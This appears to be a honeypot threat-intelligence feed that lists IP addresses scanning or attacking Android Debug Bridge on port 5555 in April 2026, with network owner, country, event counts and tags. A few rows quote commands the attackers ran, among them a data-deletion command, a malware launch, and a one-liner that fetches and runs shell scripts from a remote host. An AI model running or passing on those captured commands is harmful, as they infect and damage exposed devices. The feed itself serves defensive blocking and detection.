IPv4	39.144.102.105	Attacker IP • ADB / seen in ADBHoney; events=39; ports=5555; cc=CN; asn=134810; asn_org=China Mobile Group JiLin communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=8; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-04. events=40 \| first_seen=2026-04-11T03:47:36.000Z \| last_seen=2026-04-11T04:02:44.883Z \| ports=5555 \| cc=CN \| asn=134810 \| org=China Mobile Group JiLin communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-11
IPv4	209.99.188.250	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=402253; asn_org=SKN Subnet & Telecom Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-11T05:12:01.000Z \| last_seen=2026-04-11T05:13:06.058Z \| ports=5555 \| cc=US \| asn=402253 \| org=SKN Subnet & Telecom Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	187.133.174.158	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=MX; asn=8151; asn_org=UNINET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-11T06:56:18.000Z \| last_seen=2026-04-11T07:06:26.972Z \| ports=5555 \| cc=MX \| asn=8151 \| org=UNINET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	65.49.1.142	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=20 \| first_seen=2026-04-11T06:09:18.000Z \| last_seen=2026-04-21T11:30:06.499Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	65.49.1.150	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-11T06:08:42.000Z \| last_seen=2026-04-11T06:09:51.958Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	186.106.171.207	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CL; asn=7418; asn_org=TELEFONICA CHILE S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-11T07:21:38.000Z \| last_seen=2026-04-11T07:31:48.747Z \| ports=5555 \| cc=CL \| asn=7418 \| org=TELEFONICA CHILE S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	87.121.84.182	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=14 \| first_seen=2026-04-11T07:49:50.000Z \| last_seen=2026-04-11T07:59:59.795Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	70.48.146.5	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CA; asn=577; asn_org=Bell Canada; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-11T09:59:11.000Z \| last_seen=2026-04-11T10:00:16.771Z \| ports=5555 \| cc=CA \| asn=577 \| org=Bell Canada	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	91.230.168.209	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-11T09:39:14.000Z \| last_seen=2026-04-11T09:49:27.827Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	91.230.168.85	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-11T09:35:54.000Z \| last_seen=2026-04-11T09:36:58.405Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	91.230.168.88	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=10 \| first_seen=2026-04-11T09:39:13.000Z \| last_seen=2026-04-11T09:49:20.831Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	138.197.101.95	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-11T10:18:22.000Z \| last_seen=2026-04-11T10:28:33.006Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	104.243.35.104	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=147 \| first_seen=2026-04-11T12:04:21.000Z \| last_seen=2026-04-30T16:11:49.885Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	80.94.95.221	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-11T12:15:47.000Z \| last_seen=2026-04-11T13:21:04.478Z \| ports=5555 \| cc=RO \| asn=204428 \| org=SS-Net	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	46.251.143.21	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=SA; asn=35819; asn_org=Etihad Etisalat, a joint stock company; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=28 \| first_seen=2026-04-11T14:55:14.000Z \| last_seen=2026-04-11T15:05:24.199Z \| ports=5555 \| cc=SA \| asn=35819 \| org=Etihad Etisalat, a joint stock company	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	143.42.1.123	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-11T15:47:17.000Z \| last_seen=2026-04-11T15:48:25.049Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	85.217.140.43	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=209334; asn_org=Modat B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-11T18:02:13.000Z \| last_seen=2026-04-11T18:12:17.585Z \| ports=5555 \| cc=FR \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	191.177.179.199	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BR; asn=28573; asn_org=Claro NXT Telecomunicacoes Ltda; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-11T19:19:40.000Z \| last_seen=2026-04-11T19:21:17.302Z \| ports=5555 \| cc=BR \| asn=28573 \| org=Claro NXT Telecomunicacoes Ltda	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	79.92.119.157	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=FR; asn=15557; asn_org=Societe Francaise Du Radiotelephone - SFR SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-11T21:57:03.000Z \| last_seen=2026-04-11T22:07:12.535Z \| ports=5555 \| cc=FR \| asn=15557 \| org=Societe Francaise Du Radiotelephone - SFR SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-11
IPv4	45.228.8.33	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=BR; asn=267062; asn_org=W-NET TELLECOM EIRELI ME; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=166 \| first_seen=2026-04-11T20:12:09.000Z \| last_seen=2026-04-23T20:10:54.656Z \| ports=5555 \| cc=BR \| asn=267062 \| org=W-NET TELLECOM EIRELI ME	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	104.243.34.165	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-12T04:29:52.000Z \| last_seen=2026-04-12T04:31:01.715Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	117.68.74.163	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=15 \| first_seen=2026-04-12T04:50:29.000Z \| last_seen=2026-04-19T05:52:15.402Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	147.185.133.250	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-12T04:09:55.000Z \| last_seen=2026-04-12T04:21:00.610Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	205.210.31.163	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-12T05:51:23.000Z \| last_seen=2026-04-12T06:02:53.728Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	184.105.247.231	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-12T06:21:52.000Z \| last_seen=2026-04-12T06:22:56.129Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	165.22.206.115	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-12T07:06:26.000Z \| last_seen=2026-04-12T07:07:32.223Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	143.110.195.142	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-12T08:31:19.000Z \| last_seen=2026-04-12T08:41:31.665Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	154.12.33.191	Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=US; asn=35251; asn_org=NetLab Global; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=41 \| first_seen=2026-04-12T11:41:34.000Z \| last_seen=2026-04-12T11:49:54.831Z \| ports=5555 \| cc=US \| asn=35251 \| org=NetLab Global	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	157.230.81.134	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-12T11:27:11.000Z \| last_seen=2026-04-12T11:28:13.629Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	2.84.96.188	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=GR; asn=6799; asn_org=OTEnet S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-12T11:04:52.000Z \| last_seen=2026-04-12T11:14:53.454Z \| ports=5555 \| cc=GR \| asn=6799 \| org=OTEnet S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	65.49.1.166	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-12T13:37:19.000Z \| last_seen=2026-04-12T13:38:26.874Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	172.202.118.22	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-12T14:26:09.000Z \| last_seen=2026-04-12T14:38:51.818Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	188.166.24.33	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-12T20:11:25.000Z \| last_seen=2026-04-12T20:23:03.523Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-12
IPv4	104.28.159.66	Attacker IP • ADB / seen in ADBHoney; events=27; ports=5555; cc=SG; asn=13335; asn_org=Cloudflare, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=27 \| first_seen=2026-04-13T00:39:23.000Z \| last_seen=2026-04-13T00:40:43.772Z \| ports=5555 \| cc=SG \| asn=13335 \| org=Cloudflare, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	64.62.156.142	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-13T01:28:35.000Z \| last_seen=2026-04-13T01:38:39.970Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	64.62.156.145	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-13T01:27:48.000Z \| last_seen=2026-04-13T01:28:51.817Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	137.184.101.104	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-13T03:11:40.000Z \| last_seen=2026-04-13T03:12:49.411Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	147.185.132.27	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=25 \| first_seen=2026-04-13T04:09:39.000Z \| last_seen=2026-04-13T04:21:10.124Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	175.107.237.17	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=1 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-13T04:48:45.000Z \| last_seen=2026-04-13T04:53:46.117Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	104.28.159.124	Attacker IP • ADB / seen in ADBHoney; events=34; ports=5555; cc=SG; asn=13335; asn_org=Cloudflare, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=34 \| first_seen=2026-04-13T08:06:30.000Z \| last_seen=2026-04-13T08:17:54.660Z \| ports=5555 \| cc=SG \| asn=13335 \| org=Cloudflare, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	108.231.204.249	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7018; asn_org=AT&T Enterprises, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-13T10:24:14.000Z \| last_seen=2026-04-13T10:34:17.266Z \| ports=5555 \| cc=US \| asn=7018 \| org=AT&T Enterprises, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	167.94.145.34	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398705; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-13T10:46:40.000Z \| last_seen=2026-04-13T10:48:21.347Z \| ports=5555 \| cc=US \| asn=398705 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	180.113.109.249	Attacker IP • ADB / seen in ADBHoney; events=50; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-04. events=50 \| first_seen=2026-04-13T11:47:46.000Z \| last_seen=2026-04-13T11:59:28.319Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-04-13
IPv4	104.28.163.16	Attacker IP • ADB / seen in ADBHoney; events=34; ports=5555; cc=SG; asn=13335; asn_org=Cloudflare, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=34 \| first_seen=2026-04-13T13:43:29.000Z \| last_seen=2026-04-13T13:54:23.915Z \| ports=5555 \| cc=SG \| asn=13335 \| org=Cloudflare, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	176.65.148.37	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=18 \| first_seen=2026-04-13T13:39:54.000Z \| last_seen=2026-04-17T21:45:22.010Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	47.91.97.187	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=AE; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=42 \| first_seen=2026-04-13T16:55:18.000Z \| last_seen=2026-04-14T13:53:52.810Z \| ports=5555 \| cc=AE \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	18.236.207.235	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-13T17:39:28.000Z \| last_seen=2026-04-13T17:49:41.439Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	71.6.233.209	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-13T17:38:37.000Z \| last_seen=2026-04-13T17:39:44.194Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	183.232.212.193	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-13T22:40:08.000Z \| last_seen=2026-04-13T22:41:12.268Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-13
IPv4	147.185.132.55	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-14T03:18:49.000Z \| last_seen=2026-04-14T03:30:23.533Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	185.150.191.165	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-14T03:44:31.000Z \| last_seen=2026-04-14T03:45:34.185Z \| ports=5555 \| cc=US \| asn=23470 \| org=ReliableSite.Net LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	152.32.181.108	Attacker IP • ADB / seen in ADBHoney; events=110; ports=5555; cc=AE; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=110 \| first_seen=2026-04-14T04:23:16.000Z \| last_seen=2026-04-14T04:47:38.683Z \| ports=5555 \| cc=AE \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	36.92.154.178	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=ID; asn=7713; asn_org=PT Telekomunikasi Indonesia; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=3 \| first_seen=2026-04-14T04:11:12.000Z \| last_seen=2026-04-14T04:12:21.651Z \| ports=5555 \| cc=ID \| asn=7713 \| org=PT Telekomunikasi Indonesia	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	142.248.80.31	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=22295; asn_org=Advin Services LLC; adb_cmd_hits=1; cmd="cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh" Observed in ADBHoney telemetry for 2026-04. events=89 \| first_seen=2026-04-14T05:12:49.000Z \| last_seen=2026-04-27T12:34:16.048Z \| ports=5555 \| cc=US \| asn=22295 \| org=Advin Services LLC	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	159.203.110.115	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=16 \| first_seen=2026-04-14T05:15:48.000Z \| last_seen=2026-04-14T05:26:33.960Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	189.228.85.169	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=MX; asn=8151; asn_org=UNINET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-14T14:38:42.000Z \| last_seen=2026-04-14T14:48:44.400Z \| ports=5555 \| cc=MX \| asn=8151 \| org=UNINET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	87.251.64.158	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=200730; asn_org=ISAEV Igor; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-14T14:58:47.000Z \| last_seen=2026-04-14T14:59:49.253Z \| ports=5555 \| cc=US \| asn=200730 \| org=ISAEV Igor	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	172.238.160.104	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-14T15:46:56.000Z \| last_seen=2026-04-14T15:48:04.950Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	176.171.27.168	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=5410; asn_org=Bouygues Telecom SA; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-14T15:40:49.000Z \| last_seen=2026-04-14T15:50:58.083Z \| ports=5555 \| cc=FR \| asn=5410 \| org=Bouygues Telecom SA	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	104.28.159.63	Attacker IP • ADB / seen in ADBHoney; events=38; ports=5555; cc=SG; asn=13335; asn_org=Cloudflare, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=38 \| first_seen=2026-04-14T16:19:49.000Z \| last_seen=2026-04-14T16:31:02.834Z \| ports=5555 \| cc=SG \| asn=13335 \| org=Cloudflare, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	185.151.146.250	Attacker IP • ADB / seen in ADBHoney; events=31; ports=5555; cc=SG; asn=401443; asn_org=WAP.AC LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=39 \| first_seen=2026-04-14T18:51:35.000Z \| last_seen=2026-04-14T19:07:50.686Z \| ports=5555 \| cc=SG \| asn=401443 \| org=WAP.AC LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	98.218.89.169	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-14T18:20:22.000Z \| last_seen=2026-04-14T18:30:30.244Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-14
IPv4	139.135.46.251	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=12 \| first_seen=2026-04-14T22:26:21.000Z \| last_seen=2026-04-14T22:36:37.572Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-04-14
